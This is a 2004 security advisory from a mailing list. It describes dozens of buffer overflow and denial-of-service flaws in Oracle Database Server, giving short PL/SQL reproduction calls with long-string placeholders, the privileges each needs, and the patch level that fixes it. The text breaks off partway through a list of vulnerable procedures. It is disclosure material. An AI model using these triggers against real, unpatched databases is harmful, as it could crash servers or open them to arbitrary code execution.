[NEWS] Multiple Vulnerabilities in Oracle Database Server (40 Issues)
From: SecuriTeam (support_at_securiteam.com)
Date: 09/02/04
- Previous message: SecuriTeam: "[NT] Chat Anywhere DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 2 Sep 2004 12:40:56 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Vulnerabilities in Oracle Database Server (40 Issues)
------------------------------------------------------------------------
SUMMARY
Multiple buffer overflow and denial of service (DoS) vulnerabilities exist
in the Oracle Database Server that allow database users to take complete
control over the database and optionally cause denial of service.
DETAILS
Please follow the links for details of the vulnerabilities:
#1 - Buffer overflow in public procedure DROP_SITE_INSTANTIATION of
DBMS_REPCAT_INSTANTIATE package
Oracle Database Server provides the DBMS_REPCAT_INSTANTIATE package that
can be used in replicated environments to manage the instantiation of
deployment templates. This package contains a public procedure
DROP_SITE_INSTANTIATION that is used to remove a template instantiation at
a target site. When this procedure is called with a long string in the
first parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
BEGIN
DBMS_REPCAT_INSTANTIATE.DROP_SITE_INSTANTIATION ('longstring','');
END;
Analysis:
By default DBMS_REPCAT_INSTANTIATE has EXECUTE permission to PUBLIC so any
Oracle database user can exploit this vulnerability.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#2 - Buffer overflow in public function INSTANTIATE_OFFLINE of
DBMS_REPCAT_INSTANTIATE package
Details:
Oracle Database Server provides the DBMS_REPCAT_INSTANTIATE package that
can be used in replicated environments to manage the instantiation of
deployment templates. This package contains a public function
INSTANTIATE_OFFLINE that is used to generate a script at the master site
to create the materialized view environment at the remote materialized
view site while offline. When this function is called with a long string
in the first parameter a buffer overflow occurs.
To reproduce the overflow, execute the next SQL:
SELECT DBMS_REPCAT_INSTANTIATE.INSTANTIATE_OFFLINE ('longstring','') FROM
Dual
or
DECLARE
a NUMBER;
BEGIN
a := DBMS_REPCAT_INSTANTIATE.INSTANTIATE_OFFLINE('longstring','');
END;
Analysis:
By default DBMS_REPCAT_INSTANTIATE has EXECUTE permission to PUBLIC so any
Oracle database user can exploit this vulnerability.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#3 - Buffer overflow in public function INSTANTIATE_ONLINE of
DBMS_REPCAT_INSTANTIATE package
Details:
Oracle Database Server provides the DBMS_REPCAT_INSTANTIATE package that
can be used in replicated environments to manage the instantiation of
deployment templates. This package contains a public function
INSTANTIATE_ONLINE that is used to generate a script at the master site to
create the materialized view environment at the remote materialized view
site while online. When this function is called with a long string in the
first parameter a buffer overflow occurs.
To reproduce the overflow, execute the next SQL:
SELECT DBMS_REPCAT_INSTANTIATE.INSTANTIATE_ONLINE ('longstring','') FROM
Dual
Analysis:
By default DBMS_REPCAT_INSTANTIATE has EXECUTE permission to PUBLIC so any
Oracle database user can exploit this vulnerability
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#4 - Buffer overflow on "gname" parameter on procedures of Replication
Management API Packages
Details:
Oracle Database Server provides a set of packages that can be used to
administer a replicated environment. Some procedures of these packages use
the parameter "gname" to specify a group name. When a long string is
passed to this parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
BEGIN
DBMS_REPCAT.DROP_MASTER_REPGROUP ('longstring');
END;
or
BEGIN
DBMS_REPCAT.ALTER_MVIEW_PROPAGATION ('longstring', '');
END;
or
BEGIN
DBMS_OFFLINE_OG.BEGIN_LOAD ('longstring', 'x');
END;
or
BEGIN
DBMS_OFFLINE_SNAPSHOT.END_LOAD ('longstring', 'x',\u2019d\u2019);
END;
etc.
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or
SYSDBA roles, and users granted execute permissions on the vulnerable
packages.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#5 - Buffer overflow on "sname" and "oname" parameters on procedures of
DBMS_REPCAT package
Details:
Oracle Database Server provides the DBMS_REPCAT package that can be used
to administer and update the replication catalog and environment. Some
procedures of this package use the parameters "sname" to specify a schema
name and "oname" to specify an object name. When a long string is passed
to any of these parameters a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
BEGIN
DBMS_REPCAT.ADD_GROUPED_COLUMN ('longstring', 'longstring', 'cc','dd');
END;
or
BEGIN
DBMS_REPCAT.ADD_DELETE_RESOLUTION ('longstring', 'longstring', 0, '', '');
END;
or
BEGIN
DBMS_REPCAT.CANCEL_STATISTICS ('longstring', 'longstring');
END;
etc.
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or
SYSDBA roles and users granted execute permissions on the DBMS_REPCAT
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#6 - Buffer overflow on "type" parameter on procedures of DBMS_REPCAT
package
Details:
Oracle Database Server provides the DBMS_REPCAT package that can be used
to administer and update the replication catalog and environment. Some
procedures of this package use the parameter "type" to specify the type of
the object being referenced in other parameters. When a long string is
passed to this parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
BEGIN
DBMS_REPCAT.ALTER_MASTER_REPOBJECT ('', '', 'longstring', 'dd', 'ee',
false,false);
END;
or
BEGIN< DBMS_REPCAT.COMMENT_ON_REPOBJECT ('', '', 'longstring', '');
END;
or
BEGIN
DBMS_REPCAT.DROP_MASTER_REPOBJECT ('aa', 'bb', 'longstring');
END;
etc.
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or
SYSDBA roles, and users granted execute permissions on the DBMS_REPCAT
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#7 - Buffer overflow on "gowner" parameter on procedures of the
DBMS_REPCAT package
Details:
Oracle Database Server provides the DBMS_REPCAT package that can be used
to administer and update the replication catalog and environment. Some
procedures of this package use the parameter "gowner" to specify the owner
of the materialized view group. When a long string is passed to this
parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
BEGIN
DBMS_REPCAT.DROP_MVIEW_REPGROUP ('', false, 'longstring');
END;
or
BEGIN
DBMS_REPCAT.REFRESH_MVIEW_REPGROUP ('', false, false, false,
'longstring');
END;
or
BEGIN
DBMS_REPCAT.REPCAT_IMPORT_CHECK ('longstring', false, 'longstring');
END;
etc.
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or
SYSDBA roles, and users granted execute permissions on the DBMS_REPCAT
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#8 - Buffer overflow on "operation" parameter on procedures of DBMS_REPCAT
package
Details:
Oracle Database Server provides the DBMS_REPCAT package that can be used
to administer and update the replication catalog and environment. Some
procedures of this package use the parameter "operation" to specify a kind
data operation ('update', 'delete' or both). When a long string is passed
to this parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
BEGIN
DBMS_REPCAT.COMPARE_OLD_VALUES ('hr', 'employees', 'employee_id',
'longstring', true);
END;
or
BEGIN
DBMS_REPCAT.SEND_OLD_VALUES ('hr', 'employees',
'employee_id','longstring');
END;
etc.
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or
SYSDBA roles and users granted execute permissions on the DBMS_REPCAT
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#9 - Buffer overflow in procedure CREATE_MVIEW_REPGROUP of DBMS_REPCAT
package
Details:
Oracle Database Server provides the DBMS_REPCAT package that can be used
to administer and update the replication catalog and environment. This
package contains a procedure CREATE_MVIEW_REPGROUP used to create a new
materialized view group in the local database. When this procedure is
called with a long string in the fifth parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
BEGIN
DBMS_REPCAT.CREATE_MVIEW_REPGROUP ('', '', '', '', 'longstring', '');
END;
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or
SYSDBA roles and users granted execute permissions on DBMS_REPCAT package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#10 - Buffer overflow in procedure GENERATE_REPLICATION_SUPPORT of
DBMS_REPCAT package
Details:
Oracle Database Server provides the DBMS_REPCAT package that can be used
to administer and update the replication catalog and environment. This
package contains a procedure GENERATE_REPLICATION_SUPPORT used to generate
the triggers and packages needed to support replication for a specified
object.
When this procedure is called with a long string in the "package_prefix"
or "procedure_prefix" parameters a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
BEGIN
DBMS_REPCAT.GENERATE_REPLICATION_SUPPORT ('aa', 'bb', 'TABLE',
'longstring','longstring', true, 'gg');
END;
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or
SYSDBA roles and users granted execute permissions on DBMS_REPCAT package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#11 - Buffer overflow in procedures REGISTER_USER_REPGROUP and
UNREGISTER_USER_REPGROUP of DBMS_REPCAT_ADMIN package
Details:
Oracle Database Server provides the DBMS_REPCAT_ADMIN package that can be
used to create users with the privileges needed by the symmetric
replication facility. This package contains the procedures
REGISTER_USER_REPGROUP and UNREGISTER_USER_REPGROUP used to assign and
revoke proxy materialized view administrator or receiver privileges at the
master site or master materialized view site for use with remote sites.
When this procedure is called with a long string in the "privilege_type"
parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
BEGIN
DBMS_REPCAT_ADMIN.REGISTER_USER_REPGROUP ('sys', 'longstring', '');
END;
or
BEGIN
DBMS_REPCAT_ADMIN.UNREGISTER_USER_REPGROUP ('sys', 'longstring', '');
END;
Analysis:
This vulnerability can be exploited by users members of
EXECUTE_CATALOG_ROLE or SYSDBA roles and users granted execute permissions
on DBMS_REPCAT_ADMIN package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#12 - Buffer overflow in functions INSTANTIATE_OFFLINE, INSTANTIATE_ONLINE
and procedure DROP_SITE_INSTANTIATION of DBMS_REPCAT_RGT package
Details:
Oracle Database Server provides the DBMS_REPCAT_RGT package that can be
used to control the maintenance and definition of refresh group templates.
This package contains the procedures INSTANTIATE_OFFLINE,
INSTANTIATE_ONLINE and DROP_SITE_INSTANTIATION. When these procedures are
called with a long string in the "refresh_template_name" or the
"user_name" parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
SELECT DBMS_REPCAT_RGT.INSTANTIATE_OFFLINE ('longstring', '', '') FROM
Dual;
or
SELECT DBMS_REPCAT_RGT.INSTANTIATE_ONLINE ('some_refresh_template_name',
'', 'longstring') FROM Dual;
or
BEGIN
DBMS_REPCAT_RGT.DROP_SITE_INSTANTIATION ('longstring', '', '');
END;
etc.
Analysis:
This vulnerability can be exploited by members of SYSDBA role and users
granted execute permissions on DBMS_REPCAT_RGT package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#13 - Buffer overflow on TEMPFILE parameter
Details:
Oracle Database Server allows specifying temporary files to be used by
database, when creating or altering a tablespace, altering a database,
etc. When a long string is passed to TEMPFILE parameter a buffer overflow
occurs.
To reproduce the overflow, execute the next PL/SQL:
ALTER TABLESPACE TablespaceName ADD TEMPFILE 'longstringhere';
or
CREATE TEMPORARY TABLESPACE TablespaceName TEMPFILE 'longstringhere';
or
ALTER DATABASE TEMPFILE 'longstringhere' online;
or
etc.
Analysis:
This vulnerability can be exploited on ALTER DATABASE by users with the
ALTER DATABASE system privilege, on CREATE TABLESPACE by users with CREATE
TABLESPASE system privilege, on ALTER TABLESPACE by users with ALTER
TABLESPACE system privilege. Exploitation of this vulnerability allows an
attacker to execute arbitrary code. It can also be exploited to cause DOS
(Denial of service) killing Oracle server process.
Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. 10g Not vulnerable.
#14 - Buffer overflow on LOGFILE parameter
Details:
Oracle Database Server allows adding redo log files to be used by
database, by using alter database statement. When a long string is passed
to LOGFILE parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
ALTER DATABASE CLEAR LOGFILE 'longstringhere';
or
ALTER DATABASE RECOVER LOGFILE 'longstringhere';
or
ALTER DATABASE DROP LOGFILE MEMBER 'longstringhere';
or
etc.
Analysis:
This vulnerability can be exploited by users with the ALTER DATABASE
system privilege. Exploitation of this vulnerability allows an attacker to
execute arbitrary code. It can also be exploited to cause DOS (Denial of
service) killing Oracle server process.
Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. 10g Not vulnerable.
#15 - Buffer overflow on CONTROLFILE parameter
Details:
Oracle Database Server allows creation and backup of control files to be
used later, by issuing alter database statement. When a long string is
passed to CONTROLFILE parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
ALTER DATABASE BACKUP CONTROLFILE TO 'longstringhere';
or
ALTER DATABASE CREATE STANDBY CONTROLFILE AS'longstringhere';
or
etc.
Analysis:
This vulnerability can be exploited by users with the ALTER DATABASE
system privilege. Exploitation of this vulnerability allows an attacker to
execute arbitrary code. It can also be exploited to cause DOS (Denial of
service) killing Oracle server process.
Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. 10g Not vulnerable.
#16 - Buffer overflow on FILE parameter
Details:
Oracle Database Server allows to rename data files used by database, by
using the alter database statement. When a long string is passed to FILE
parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
ALTER DATABASE RENAME FILE 'longstringhere' TO 'anything';
Analysis:
This vulnerability can be exploited by users with the ALTER DATABASE
system privilege.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. 10g Not vulnerable.
#17 - Buffer overflow in Interval Conversion Functions
Details:
Oracle Database Server provides two functions that can be used with PL/SQL
to convert numbers to date/time intervals, when any of these functions are
called with a long string as a second parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;
SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;
Analysis:
This vulnerability can be exploited by any Oracle Database user because
access to these functions can't be restricted.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Oracle 9ir2 Patchset 3 (9.2.0.4) Patch 3. 10g Not vulnerable.
#18 - Buffer overflow in String Conversion Function
Details:
Oracle Database Server provides a function that can be used with PL/SQL to
convert a number or date to a string, when this function is called with
the function SYSTIMESTAMP (this function returns the system date,
including fractional seconds and time zone of the database) as a first
parameter and a long string as a second parameter a buffer overflow
occurs.
To reproduce the overflow, execute the next PL/SQL:
select TO_CHAR(SYSTIMESTAMP, 'longstringhere') from dual;
Analysis:
This vulnerability can be exploited by any Oracle Database user because
access to this function can't be restricted.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process. Calling TO_CHAR function with a different value
than SYSTIMESTAMP function as first parameter seems to not cause a buffer
overflow, but it shouldn't be discarded that other values could trigger a
buffer overflow.
Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. Fixed in 10g Release 1.
#19 - Buffer overflow in CTX_OUTPUT Package Function
Details:
Oracle Database Server provides many packages, one of them called
CTX_OUTPUT which can be used to log indexing and document service
requests, has a vulnerable function, when this function is called with a
long string a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
begin
CTX_OUTPUT.START_LOG('longstringhere');
end;
Analysis:
This vulnerability can be exploited by members of Oracle CTXAPP Role,
CTXSYS user and users granted execute permissions on CTX_OUTPUT package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in latest Oracle 9ir2 Patchset 4 (9.2.0.5) patch 2. 10g not
vulnerable.
#21 - Buffer overflow on DATAFILE parameter
Details:
Oracle Database Server allows specifying data files where the data will be
stored when creating a database, altering an index etc. When a long string
is passed to DATAFILE parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
ALTER DATABASE datafile 'longstringhere' ONLINE;
or
ALTER INDEX indexname allocate extent(datafile 'longstringhere');
or
CREATE TABLESPACE tablespacename DATAFILE 'longstringhere';
or
ALTER CLUSTER clustername allocate extent(datafile 'longstringhere');
or
etc.
Analysis:
This vulnerability can be exploited in many ways:
1. using ALTER INDEX statement by users who have their own schema and
users with ALTER ANY INDEX system privilege
2. using ALTER DATABASE by users with the ALTER DATABASE system privilege
3. using CREATE TABLESPACE by users with CREATE TABLESPASE system
privilege
4. using ALTER CLUSTER by users who have their own schema and users with
ALTER ANY CLUSTER system privilege
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in latest Oracle 9ir2 Patchset 4 (9.2.0.5) patch 2. 10g not
vulnerable.
#22 - Buffer overflow in DBMS_SYSTEM package function
Details:
Oracle Database Server provides many packages. One of them called
DBMS_SYSTEM can be used to gather information about events set in the
current session. It can also be used to manipulate other user\u2019s
sessions and change the values of certain init.ora parameters. It contains
a vulnerable function which causes buffer overflow when called with a long
string in the second parameter.
To reproduce the overflow, execute the next PL/SQL:
begin
DBMS_SYSTEM.KSDWRT(2,'longstringhere');
end;
Analysis:
This vulnerability can be exploited by members of SYSDBA role and users
granted execute permissions on DBMS_SYSTEM package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5). 10g not vulnerable.
#24 - Buffer overflow on "fname" parameter of the DBMS_REPCAT* packages
Details:
Oracle Database Server provides the DBMS_REPCAT package that can be used
to administer and update the replication catalog and environment. Some
procedures of this package use the parameter "fname". When a long string
is passed to this parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
BEGIN
SYS.DBMS_REPCAT_FLA.ENSURE_NOT_PUBLISHED('', 'longstring');
END;
etc.
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or
SYSDBA roles, and users granted execute permissions on the DBMS_REPCAT
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5). 10g not vulnerable.
#25 - Buffer overflow on procedures of the Replication Management API
packages
Details:
Oracle Database Server provides a set of packages that can be used to
administer a replicated environment. Some procedures of these packages are
vulnerable to buffer overflow.
These are the vulnerable procedures:
DBMS_INTERNAL_REPCAT.DISABLE_RECEIVER_TRACE
DBMS_INTERNAL_REPCAT.ENABLE_RECEIVER_TRACE
DBMS_INTERNAL_REPCAT.VALIDATE
DBMS_OFFLINE_OG.BEGIN_FLAVOR_CHANGE
DBMS_OFFLINE_OG.BEGIN_INSTANTIATION
DBMS_OFFLINE_OG.BEGIN_LOAD
DBMS_OFFLINE_OG.END_FLAVOR_CHANGE
DBMS_OFFLINE_OG.END_INSTANTIATION
DBMS_OFFLINE_OG.END_LOAD
DBMS_OFFLINE_OG.RESUME_SUBSET_OF_MASTERS
DBMS_OFFLINE_RGT.ADD_CONFLICT_OFFLINE
DBMS_OFFLINE_RGT.ADD_FLAVOR_OBJECT_OFFLINE
DBMS_OFFLINE_RGT.ADD_GROUPED_COLUMN_OFFLINE
DBMS_OFFLINE_RGT.ADD_INTERNAL_PKG
DBMS_OFFLINE_RGT.ADD_MASTER_OFFLINE
DBMS_OFFLINE_RGT.ADD_PARAMETER_COLUMN_OFFLINE
DBMS_OFFLINE_RGT.ADD_PRIORITY_GROUP_OFFLINE
DBMS_OFFLINE_RGT.ADD_PRIORITY_OFFLINE
DBMS_OFFLINE_RGT.ADD_REPCOLUMN_OFFLINE
DBMS_OFFLINE_RGT.ADD_REPOBJECT_OFFLINE
DBMS_OFFLINE_RGT.ADD_RESOLUTION_OFFLINE
DBMS_OFFLINE_RGT.ADD_SNAPMASTER_OFFLINE
DBMS_OFFLINE_SNAPSHOT.BEGIN_LOAD
DBMS_OFFLINE_SNAPSHOT.END_LOAD
DBMS_RECTIFIER_DIFF.DIFFERENCES
DBMS_RECTIFIER_DIFF.RECTIFY
DBMS_REPCAT.ABORT_FLAVOR_DEFINITION
DBMS_REPCAT.ADD_COLUMN_GROUP_TO_FLAVOR
DBMS_REPCAT.ADD_COLUMNS_TO_FLAVOR
DBMS_REPCAT.ADD_DELETE_RESOLUTION
DBMS_REPCAT.ADD_GROUPED_COLUMN
DBMS_REPCAT.ADD_MASTER_DATABASE
DBMS_REPCAT.ADD_OBJECT_TO_FLAVOR
DBMS_REPCAT.ADD_PRIORITY_CHAR
DBMS_REPCAT.ADD_PRIORITY_DATE
DBMS_REPCAT.ADD_PRIORITY_NCHAR
DBMS_REPCAT.ADD_PRIORITY_NUMBER
DBMS_REPCAT.ADD_PRIORITY_NVARCHAR2
DBMS_REPCAT.ADD_PRIORITY_RAW
DBMS_REPCAT.ADD_PRIORITY_VARCHAR2
DBMS_REPCAT.ADD_SITE_PRIORITY_SITE
DBMS_REPCAT.ADD_UNIQUE_RESOLUTION
DBMS_REPCAT.ADD_UPDATE_RESOLUTION
DBMS_REPCAT.ALTER_MASTER_PROPAGATION
DBMS_REPCAT.ALTER_MASTER_REPOBJECT
DBMS_REPCAT.ALTER_MVIEW_PROPAGATION
DBMS_REPCAT.ALTER_PRIORITY
DBMS_REPCAT.ALTER_PRIORITY_CHAR
DBMS_REPCAT.ALTER_PRIORITY_DATE
DBMS_REPCAT.ALTER_PRIORITY_NCHAR
DBMS_REPCAT.ALTER_PRIORITY_NUMBER
DBMS_REPCAT.ALTER_PRIORITY_NVARCHAR2
DBMS_REPCAT.ALTER_PRIORITY_RAW
DBMS_REPCAT.ALTER_PRIORITY_VARCHAR2
DBMS_REPCAT.ALTER_SITE_PRIORITY
DBMS_REPCAT.ALTER_SITE_PRIORITY_SITE
DBMS_REPCAT.ALTER_SNAPSHOT_PROPAGATION
DBMS_REPCAT.BEGIN_FLAVOR_DEFINITION
DBMS_REPCAT.CANCEL_STATISTICS
DBMS_REPCAT.COMMENT_ON_COLUMN_GROUP
DBMS_REPCAT.COMMENT_ON_DELETE_RESOLUTION
DBMS_REPCAT.COMMENT_ON_MVIEW_REPSITES
DBMS_REPCAT.COMMENT_ON_PRIORITY_GROUP
DBMS_REPCAT.COMMENT_ON_REPGROUP
DBMS_REPCAT.COMMENT_ON_REPOBJECT
DBMS_REPCAT.COMMENT_ON_REPSITES
DBMS_REPCAT.COMMENT_ON_SITE_PRIORITY
DBMS_REPCAT.COMMENT_ON_SNAPSHOT_REPSITES
DBMS_REPCAT.COMMENT_ON_UNIQUE_RESOLUTION
DBMS_REPCAT.COMMENT_ON_UPDATE_RESOLUTION
DBMS_REPCAT.COMPARE_OLD_VALUES
DBMS_REPCAT.CREATE_MASTER_REPGROUP
DBMS_REPCAT.CREATE_MASTER_REPOBJECT
DBMS_REPCAT.CREATE_MVIEW_REPGROUP
DBMS_REPCAT.CREATE_MVIEW_REPOBJECT
DBMS_REPCAT.CREATE_SNAPSHOT_REPGROUP
DBMS_REPCAT.CREATE_SNAPSHOT_REPOBJECT
DBMS_REPCAT.DEFINE_COLUMN_GROUP
DBMS_REPCAT.DEFINE_PRIORITY_GROUP
DBMS_REPCAT.DEFINE_SITE_PRIORITY
DBMS_REPCAT.DO_DEFERRED_REPCAT_ADMIN
DBMS_REPCAT.DROP_COLUMN_GROUP
DBMS_REPCAT.DROP_COLUMN_GROUP_FROM_FLAVOR
DBMS_REPCAT.DROP_COLUMNS_FROM_FLAVOR
DBMS_REPCAT.DROP_DELETE_RESOLUTION
DBMS_REPCAT.DROP_GROUPED_COLUMN
DBMS_REPCAT.DROP_MASTER_REPGROUP
DBMS_REPCAT.DROP_MASTER_REPOBJECT
DBMS_REPCAT.DROP_MVIEW_REPGROUP
DBMS_REPCAT.DROP_MVIEW_REPOBJECT
DBMS_REPCAT.DROP_OBJECT_FROM_FLAVOR
DBMS_REPCAT.DROP_PRIORITY
DBMS_REPCAT.DROP_PRIORITY_CHAR
DBMS_REPCAT.DROP_PRIORITY_DATE
DBMS_REPCAT.DROP_PRIORITY_GROUP
DBMS_REPCAT.DROP_PRIORITY_NCHAR
DBMS_REPCAT.DROP_PRIORITY_NUMBER
DBMS_REPCAT.DROP_PRIORITY_NVARCHAR2
DBMS_REPCAT.DROP_PRIORITY_RAW
DBMS_REPCAT.DROP_PRIORITY_VARCHAR2
DBMS_REPCAT.DROP_SITE_PRIORITY
DBMS_REPCAT.DROP_SITE_PRIORITY_SITE
DBMS_REPCAT.DROP_SNAPSHOT_REPGROUP
DBMS_REPCAT.DROP_SNAPSHOT_REPOBJECT
DBMS_REPCAT.DROP_UNIQUE_RESOLUTION
DBMS_REPCAT.DROP_UPDATE_RESOLUTION
DBMS_REPCAT.EXECUTE_DDL
DBMS_REPCAT.GENERATE_FLAVOR_NAME
DBMS_REPCAT.GENERATE_MVIEW_SUPPORT
DBMS_REPCAT.GENERATE_REPLICATION_PACKAGE
DBMS_REPCAT.GENERATE_REPLICATION_SUPPORT
DBMS_REPCAT.GENERATE_REPLICATION_TRIGGER
DBMS_REPCAT.GENERATE_SNAPSHOT_SUPPORT
DBMS_REPCAT.MAKE_COLUMN_GROUP
DBMS_REPCAT.OBSOLETE_FLAVOR_DEFINITION
DBMS_REPCAT.PUBLISH_FLAVOR_DEFINITION
DBMS_REPCAT.PURGE_FLAVOR_DEFINITION
DBMS_REPCAT.PURGE_MASTER_LOG
DBMS_REPCAT.PURGE_STATISTICS
DBMS_REPCAT.REFRESH_MVIEW_REPGROUP
DBMS_REPCAT.REFRESH_SNAPSHOT_REPGROUP
DBMS_REPCAT.REGISTER_MVIEW_REPGROUP
DBMS_REPCAT.REGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT.REGISTER_STATISTICS
DBMS_REPCAT.RELOCATE_MASTERDEF
DBMS_REPCAT.REMOVE_MASTER_DATABASES
DBMS_REPCAT.RENAME_SHADOW_COLUMN_GROUP
DBMS_REPCAT.REPCAT_IMPORT_CHECK
DBMS_REPCAT.RESUME_MASTER_ACTIVITY
DBMS_REPCAT.SEND_AND_COMPARE_OLD_VALUES
DBMS_REPCAT.SEND_OLD_VALUES
DBMS_REPCAT.SET_COLUMNS
DBMS_REPCAT.SET_LOCAL_FLAVOR
DBMS_REPCAT.SPECIFY_NEW_MASTERS
DBMS_REPCAT.SUSPEND_MASTER_ACTIVITY
DBMS_REPCAT.SWITCH_MVIEW_MASTER
DBMS_REPCAT.SWITCH_SNAPSHOT_MASTER
DBMS_REPCAT.UNREGISTER_MVIEW_REPGROUP
DBMS_REPCAT.UNREGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT.VALIDATE
DBMS_REPCAT.VALIDATE_FLAVOR_DEFINITION
DBMS_REPCAT.VALIDATE_FOR_LOCAL_FLAVOR
DBMS_REPCAT.WAIT_MASTER_LOG
DBMS_REPCAT_ADD_MASTER.SPECIFY_NEW_MASTERS
DBMS_REPCAT_ADMIN.REGISTER_USER_REPGROUP
DBMS_REPCAT_ADMIN.UNREGISTER_USER_REPGROUP
DBMS_REPCAT_AUTH.GRANT_SURROGATE_REPCAT
DBMS_REPCAT_AUTH.REVOKE_SURROGATE_REPCAT
DBMS_REPCAT_CONF.ADD_DELETE_RESOLUTION
DBMS_REPCAT_CONF.ADD_GROUPED_COLUMN
DBMS_REPCAT_CONF.ADD_PRIORITY_CHAR
DBMS_REPCAT_CONF.ADD_PRIORITY_DATE
DBMS_REPCAT_CONF.ADD_PRIORITY_NCHAR
DBMS_REPCAT_CONF.ADD_PRIORITY_NUMBERv
DBMS_REPCAT_CONF.ADD_PRIORITY_NVARCHAR2
DBMS_REPCAT_CONF.ADD_PRIORITY_RAW
